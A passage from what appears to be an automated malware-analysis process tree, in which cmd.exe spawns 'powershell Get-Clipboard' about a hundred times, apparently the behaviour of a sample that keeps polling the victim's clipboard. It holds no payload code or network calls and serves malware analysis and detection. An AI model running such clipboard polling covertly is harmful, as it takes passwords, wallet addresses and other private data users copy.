  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:8024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:8000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:8092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:8088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6256
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:8188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:8028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:8012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6192
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1192
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:8000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
